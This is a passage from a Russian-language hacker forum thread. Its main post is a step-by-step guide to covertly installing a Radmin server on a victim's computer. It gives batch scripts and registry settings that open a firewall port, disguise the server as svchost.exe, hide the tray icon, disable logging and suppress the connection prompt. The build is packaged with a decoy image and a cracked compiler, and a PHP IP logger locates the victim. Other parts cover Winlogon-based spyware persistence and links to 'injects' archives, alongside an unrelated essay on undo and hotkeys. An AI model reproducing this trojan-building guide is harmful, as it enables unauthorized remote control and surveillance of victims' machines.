                          Естественно, после обнаружения такого места, вероятно специально предназначенного для поселения шпионов и троянов, оставалось найти нечто подобное в Windows NT/2000. Были сомнения, что это удастся. Но оно действительно нашлось. Полностью идентичное вышеописанному, только загрузкой библиотек занимается сервис Winlogon. В разделе реестра «HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ Notify» добавляется произвольный подключ с очень похожими параметрами. Радует, что эта возможность оказалась вполне документированной. Подробное описание есть в MSDN.

                          Таким образом, метод оказался универсальным. Оформить шпиона в виде динамической библиотеки можно и для Windows 95/98, и для Windows NT/2000.

                          Комментарий


                          • #73
                            Скрытая установка сервера Radmin.

                            Еще один способ скрыто установить сервер радмина на целевой машине.

                            мануал в честь нового года специально для xaker.name и grabberz.com.


                            В архиве имеется все необходимое:
                            AdmDll.dll, raddrv.dll - необходимые, для работы радмина, библиотеки.
                            svhost.exe - собственно, сам сервер радмина.
                            1.jpg - просто пикча, которая откроется после запуска билда сервера.
                            111.bat, 111.reg - в этих файлах записаны все настройки устанавливаемого сервера.
                            radmin_viewer.exe программа для подключения к серверу radmin.
                            quickbfc_installer - инстольник программы, для конвертирования батников в *.exe, Quick Batch File Compiller. (и кряк к ней quick.batch.file.compiler.2.1.5.0-patch.exe)
                            Теперь идем в папку со всем этим добром. рассмотрим файл Source.bat
                            Видим в нем слуедующий код:

                            Код:
                            mkdir %SYSTEMROOT%\system32\administration_assembly\access_protocol
                            copy /y "%MYFILES%\svchost.exe" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/svchost.exe"
                            copy /y "%MYFILES%\raddrv.dll" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/raddrv.dll"
                            copy /y "%MYFILES%\AdmDll.dll" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/AdmDll.dll"
                            copy /y "%MYFILES%\111.bat" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/111.bat"
                            copy /y "%MYFILES%\111.reg" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/111.reg"
                            netsh firewall add portopening protocol = TCP port = тут_указывайте_свой_порт name = TCP
                            reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
                            reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
                            reg import "%SYSTEMROOT%/help/Tours/nnTour/111.reg
                            regedit /s "%SYSTEMROOT%/help/Tours/nnTour/111.reg
                            "%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /install /silence
                            "%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /save /silence /pass:тут_указывайте_свой_пароль /port:тут_указывайте_свой_порт
                            "%SYSTEMROOT%/system32/administration_assembly/access_protocol/svchost.exe" /start
                            "%MYFILES%\1.jpg"
                            Тут редактируем создаваемые пути/фалы на свой вкус.
                            Этот код, его и надо компилировать в экзешник, собственно скопирует файлы из папки "Files"(имеет переменное значение %MYFILES%) в указанную папку. В моем примере %SYSTEMROOT%\system32\administration_assembly\acce ss_protocol

                            Дальше рассмотрим файл 111.reg
                            В нем мы наблюдаем такой код:

                            Код:
                            Windows Registry Editor Version 5.00

                            [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

                            [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

                            [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

                            [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]

                            [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
                            "NTAuthEnabled"=hex:00,00,00,00
                            "Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce,1a
                            "DisableTrayIcon"=hex:01,00,00,00
                            "Port"=hex:23,13,00,00
                            "EnableLogFile"=hex:00,00,00,00
                            "LogFilePath"="c:\\logfile.txt"
                            "FilterIp"=hex:00,00,00,00
                            "AskUser"=hex:00,00,00,00

                            [HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
                            "Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5,89,e4,b9,49,c8,49,00,1c,eb,\
                            18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74,94,4f,49,42,46,f7,ab,05,\
                            1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28Цитата:
                            NTAuthEnabled - если второй байт - 1, то при подключении клиента
                            используется технология NT авторизации. В противном
                            случае, происходит простая аутентификация по паролю,
                            что нам и нужно, поэтому оставляем ноль;

                            Parameter - пароль, который будет запрашиваться при соединении с
                            сервером;

                            DisableTrayIcon - если везде нули, то иконка в трее отображается. Если
                            второй байт - 1, то соответственно не отображается.
                            Оставляем ноль;

                            Port - порт, на котором сервер будет ждать соединения;

                            EnableLogFile - если везде нули, то RAdmin не ведет логи. Если же
                            01,00,00,00, то сервер ведет лог в файле,указанном в
                            параметре LogFilePath.Нам лишние следы ни к чему,так
                            что оставляем отключенным;

                            EnableEventLog - если второй байт - 1, то действия RAdmin'a
                            фиксируются в журнале windows и наоборот с нулевым
                            вторым байтом. Отключаем;

                            FilterIp - если второй байт - 1, то разрешает соединения только
                            с ip адресов, указанных в ветке
                            HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplis t
                            реестра.Иначе не фильтрует входящие соединения по ip
                            адресу;

                            AskUser - если второй байт - 1, то выдает окно с запросом
                            принять/отклонить входящее соединение на системе, на
                            которой запущен сервер. Чтобы не отвлекать жертву от
                            важных дел, также оставляем ноль.
                            Дальше файл 111.bat:

                            Код:
                            netsh firewall add portopening protocol = TCP port = тут_порт name = TCP
                            reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
                            reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
                            copy /y "svchost.exe" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/svchost.exe"
                            copy /y "raddrv.dll" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/raddrv.dll"
                            copy /y "AdmDll.dll" "%SYSTEMROOT%/system32/administration_assembly/access_protocol/AdmDll.dll"
                            reg import 111.reg
                            regedit /s 111.reg
                            "%SYSTEMROOT%/system32/administration_assembly/access_protocol/svchost.exe" /install /silence
                            "%SYSTEMROOT%/system32/administration_assembly/access_protocol/svchost.exe" /save /silence /pass:тут_пароль /port:тут_порт
                            "%SYSTEMROOT%/system32/administration_assembly/access_protocol/svchost.exe" /start
                            echo #### COMPLETE #######По сути повторяет содержимое Source.bat, этот батник содержит параметр запуска сервера, а не всего файла..
                            Теперь редактируем все эти файлы на свой вкус. Внимание! Все пароль и порт должны совпадать. Так же, во всех файлах пути к директории для установки сервера не должны отличаться.

                            Для начала нам нужно перекомпилировать батник Source.bat в *.exe.
                            В архиве лежит инстольник проги quick batch file compiler 2.1.5.0 (quickbfc_installer.exe) и кряк к ней (quick.batch.file.compiler.2.1.5.0-patch.exe)
                            Устанавливаем, патчим, открываем и копируем в него содержимое файла Source.bat.



                            Дальше щелкаем вкладку Include,
                            выбираем все файлы из папки "Files".
                            Нажимаем Build, вводим имя нашего финального файла, сохраняем




                            Теперь осталось только закинуть жертве файл и узнать ее ип.
                            Тут уж каждый придумает свой способ, но могу порекоммендовать следующий код на пхп, чтобы узнать Ip-адрес:

                            PHP код:
                            <?
                            $a = $_SERVER['REMOTE_ADDR'];
                            $b = $_SERVER['HTTP_USER_AGENT'];
                            $c = @$_SERVER['HTTP_REFERER'];
                            $d = $_SERVER['SERVER_PORT'];
                            $e = $_SERVER['HTTP_HOST'];
                            $af = $_ENV['USERNAME'];

                            $count1=" IP: $a br: $b ot: $c p: $d h: $e us: $af \n";
                            $f=fopen("log.txt","a+");
                            fwrite($f,$count1);
                            fclose($f);
                            ?>
                            Предворительно создадим файл log.txt в папке со скриптом на сервере и дадим права на запись.
                            При обращении к странице с этим скриптом в файл log.txt будет записана информация о посещении (в частности IP-адрес).

                            Узнали ип. Берем Radmin_viewer вводим ип, пароль и вуаля - нам открыт доступ.
                            На этом все.

                            ЗЫ
                            На кряк к проге сильно ругаются антивирусы. Так как другого не нашел, выкладываю этот, запускаем на свой страх и риск.

                            В кодах возможны противошкольниковые ошибки

                            Код открыт, возможностей море - это самый примитивный вариант, можно довести все до намного более высокого уровня срытности

                            Комментарий


                            • #74
                              Отставить! или немножечко про ctrl-z и иже с ним.

                              Cегодня будет более прикладной рассказ.
                              Хотя и не о том, что просили — как оказалось, пока что своих действий хватает.
                              Усаживайтесь вокруг вокруг дяди Джабера, сегодня будет не только интересное, но и на конкретных примеров. А скриншотов не будет, сегодня я не дома, а с дорогого 3г-интернета. И вообще, мне впадлу, я ленивый.
                              Сегодня будет рассказ о том, как вернуть все назад и как сделать это удобным. А именно — про в первую очередь волшебную комбинацию ctrl-z.

                              ctrl-z

                              Когда впервые кто-то придумал отменить последнее действие — это был прорыв в разработке программ и их юзабилити(ненавижу это мерзкое слово, целиком и полностью пропитанное американщиной, но к сожалению, нет более подходящего — даже руссификация этого слова, пользовательность, более мерзко и при этом меньше передает смысл). И этот прорыв переняли все и вся. Так что если программа способна что-то отменять, она должна делать это по нажатию закрученной назад стрелочки, если есть тулбары, и вне зависимости от чего-либо — по нажатию ctrl-z. И не стоит делать ошибку некоторых разработчиков, которые делают отмену только по нажатию английской z вместе с контролом. Любой шоткат должен работать с клавишей, а не с буквой. Ctrl-z на самом деле не ctrl-z. Это control и вторая слева на обычных и третья слева на ноутбучных клавиатурах.
                              Несмотря на то что ctrl-b в текстовом редакторе делает текст жирным — bold, а ctrl-i наклонным — italic — шоткат это просто клавиша, просто сделанная из двух. Шоткат должен работать независимо от раскладки. Иначе он не shortcut — короткий объезд, срез, то что в need for speed вы всегда радовались когда видели, объезд долгого поворота по прямой. Потому что пользователь тыкается, понимает что не пашет, меняет раскладку, и нажимает еще раз. Сядьте и засеките — сколько времени это занимает и сколько времени занимает достижение той же цели мышкой.

                              Кстати сейчас проверил — с правым контролом большая часть программ работает. Это тоже одно из фундаментальных правил, если не указано обратное, левые и правые контролы, шифты и так далее — равнозначны. В противном случае необходимо писать right ctrl, left shift... Несмотря на то что это несколько глупо и неудобно. Хотя в некоторых случаях можно оставить один lft ctrl(как в случае с ctrl-z — никто в своем уме не будет тянуться так далеко).

                              Корзина

                              Ладно, этот исторический период мы прошли успешно. А вот и следующий. Корзина. Для своих годов(начало девяностых, вроде бы, да?) - это было великолепно. Когда ты удалял файлы, они помещались изначально в корзину, и если что — ты всегда мог восстановить случайно снесенные данные, чего не мог сделать раньше. А что теперь? Либо корзину регулярно чистят на автомате, либо она вообще отключена. В случае со мной — балом правит shift-del, безусловное удаление. Почему? Проблема в том, что сейчас почти не удаляют данные, размер жестких дисков позволяет хранить их бесконечно. Трут в основном фильмы, игры... то, что занимает большую часть жесткого и оккупирует его.
                              А кто-то с трехтерабайтником не пользуется корзиной вообще. Нафиг ему это нужно? (:

                              Сейчас корзина, как таковая, не нужна. Она усложняет и без того непростую жизнь тупого пользователя. Пользователь привык удалять и не дергаться, а если что-то удалил не то случайно — впадать в панику. Корзину как панацею он не воспринимает вообще. Увы и ах.

                              А если подойти с умом — то получишь вполне замечательную штуку.
                              Сейчас не нужно помечать файлы на удаление. Сейчас можно пойти несколькими путями.

                              Корзина самоочищающаяся

                              Самый простой вариант. Задаешь период, и данные которые старше его трутся автоматом. Хочешь — через час после снесения удаляются. Хочешь — через неделю. Вполне себе так удобно.
                              Но вот если ты удаляешь файлы, чтобы поставить что-то нужное... Таймаут не поможет. Так что его можно отставить в сторону. А удаляют файлы как раз таки в основном из-за этого либо с целью сокрытия данных — тут скорее цифровой шредер будет нужен. Нужно что-то более хитрое.
                              И в таком случае есть другой вариант.

                              Корзина удаленных файлов с возможностью восстановления

                              Все видели программы для восстановления данных. Если подойти по уму — можно реализовать алгоритм драйвера жесткого диска(или для системы что-нибудь), который будет после удаления файлов запоминать, где они были, и по мере необходимости свободного места — заполнять поверх самых давно удаленных файлов, а потом и по самым недавно удаленным. В таком случае возникает фрагментация, причем довольно сильная, так что — необходимо разработать алгоритм дефрагментации, который будет учитывать и удаленные файлы, или просить восстановить все нужное перед удалением.

                              Честно говоря, больше мне гениальных идей про корзины не приходит в голову, и поэтому я расскажу про отмену и диалоговые окна в целом.

                              Запросы подтверждения были тоже хорошей штукой, пока кто-то в microsoft не придумал, что их нужно выкидывать перед каждым действием. И проблема возникла. Огромная проблема. Пользователи начали подтверждать все автоматом через некоторое время пользования windows. К счастью, там не додумались еще больше затруднить пользователям жизнь больше, заставляя их задумываться перед каждым выбором. Как я говорил в первой статье — это бы вызвало крайне отрицательную реакцию и запас доверия бы очень сильно уменьшился.
                              Кстати про попытки затруднить пользователя... Как ни старайся — человека со стороны нельзя заманить кнутом. Слишком много альтернатив кругом, и если твое предложение уникально — да, человек стерпит то что от него требуются какие-то усилия или те же усилия, но в денежном эквиваленте. Но если меньше трудов доставит гугленье — он пойдет искать то же, что есть у тебя под хайдом или за деньги там где это в паблике и бесплатно. А если ради достижения цели требуется не так много усилий или денег — скорее всего найдется человек, который сольет приват и скопирует его в открытый доступ.
                              Заманивать пользователя можно только пряником. «Пробный период», «техническая поддержка for free», «огромное количество уникального контента» и «первая порция героина бесплатно» заманивают гораздо больше чем «вам необходимо набрать 30 сообщений чтобы прочитать сообщение под хайдом» и «отправьте смс на бесплатный номер».

                              Так вот. Я немножко отвлекся.
                              В ворде начиная с какой-то там версии сделана клевая фишка — автовосстановление документов. Вот пришел к тебе друг, пнул ноутбук, ноутбук сломался, а ты пошел и воткнул жесткий в стационарник, друг конечно уже не друг будет, но если запуститься с этого жесткого — ворд предложит восстановить документы, в которых ты работал. Единственный минус у этой (между прочим офигеннейшей, я ради ее одной даже офиса не против лицку купить) фишки — при каждом закрытии документов она спрашивает, что делать с этими документами. По умолчанию — удалить. И так каждый раз. Гораздо круче было бы если была бы кнопка «больше не напоминать об этом при закрытии, я сам открою документы, когда мне это будет нужно». Бывает, работаю над текстом ночью, забиваю, вырубаю ноут, на утро не тянет писать дальше. И на следующий день тоже. И через день. Сажусь через неделю. И сохранять впадлу. А ворд все намекает и намекает, скотина.
                              Никогда не надо требовать от пользователя десятка подтверждений, если можно после этого всего просто отменить. А если нельзя — все равно нельзя требовать. Нужно выкинуть окошко, которое можно будет отключить через пять секунд. Ну хорошо, семь. Но не более десяти. Почему не более? Пользователю все равно будет нечего делать эти семь секунд. Он даже не успеет написать кому-то сообщение в аське и отправить — ему не трудно подождать эти секунды. И соответственно он прочитает текст, от нечего делать. Слишком маленький период времени, чтобы человек отвлекался.
                              И конечно, нужно выкидывать галку «больше не останавливать меня, я ознакомился с опасностью и необратимостью этих действий».
                              Иначе человек затрахается ждать даже эти 5-7 секунд каждый раз. Например если он зарабатывает на жизнь форматированием дисков. И весьма замечательно было бы, если бы в фоновый поток уходили сразу же те действия, которые не являются необратимыми, но необходимы. Например, в случае с форматированием — анализ дисков. Фиг с ним, что там успеется мало. Пользователю будет приятно, что он протупил не просто так.

                              Еще немножко про горячие клавиши

                              Если ты сейчас сидишь в винде — зайди в справку и посмотри горячие клавиши. Какая самая большая ошибка всех разработчиков дистрибьютивов линупса под винду? Они не используют win-клавишу. Ни один из тех что я видел. А эта кнопка - часть винды, причем немаленькая.
                              А еще есть пробел, энтер и ctrl-энтер.
                              Давайте взглянем все вместе на установщик. Любой, виндовый, работающий с инсталл-шелдом. Как он работает в плане горячих клавиш? Стрелками выбираем, пробелом подтверждаем в данном этапе что-то, энтером прощелкиваем на следующий этап.
                              На контрол-энтер обычно вешается отправка каких-то данных(кстати, если эту статью читает разработчик httpREQ — сделай отправку запроса по ctrl-enter! Я задолбался!).

                              Итак, еще раз — пробел, если задача не связана с вводом текста, отвечает за локальное подтверждение или выбор. Если задача связана с вводом текста и не должен идти перенос(идет строка) — за подтверждение введенного отвечает enter, поскольку пробел ставит разрыв. Даже если вводятся две цифры — все равно пробел не должен срабатывать. Это неочевидно.
                              Если идет многоабзацевый текст — мы должны делать перенос, энтером(в случае с общением по сети — чаты, аська, irc, jabber ну можно сказать что идет исключение, хотя это не так — просто там где ОБЫЧНО идет сообщение в одну строку перенос идет по контрол-энтеру, и отправка по энтеру, ну и наоборот для многострочных). Отправка|подверждение — контрол-энтер.

                              На сегодня почти все, еще маленький пример хорошей программы и я закончил.
                              Есть забавная фирма, вроде бы даже в ней всего один человек, либо он там директор. Называется она blumentals. Она сделала одну замечательную и удобную программу для верстальщиков и веб-разработчиков(точнее пхп-кодеров). И распространяет ее под четырьмя названиями, причем они действительно отличаются только фигурируемым везде названием, почему-то немножко разным размером инсталлятора, ключом активации и логотипом.
                              Я предпочитаю версию под названием HTMLpad, почему — мне нравится буква Н и зеленый цвет лого.
                              Но речь не об их хитрости. Они сделали офигеннейшую штуку для всех верстальщиков. На ctrl-пробел вставляется &nbsp; - пробел в верстке — и на ctrl-enter идет <BR />(там меняется немножко в зависимости от выбранной спецификации html). Вот это я считаю действительно гениальным и элегантным решением.

                              Комментарий


                              • #75
                                Ссылки на видео:
                                http://www.sendspace.com/file/19niqn
                                пароль на архив: ajDXk3uaD7

                                Ссылки на инжекты:
                                http://www.sendspace.com/file/n0qpxb - Размер 248кб - Добавленно 30.04.2010
                                Пароль на ахрив: 3MD8ds46

                                Комментарий

                                Обработка...
                                X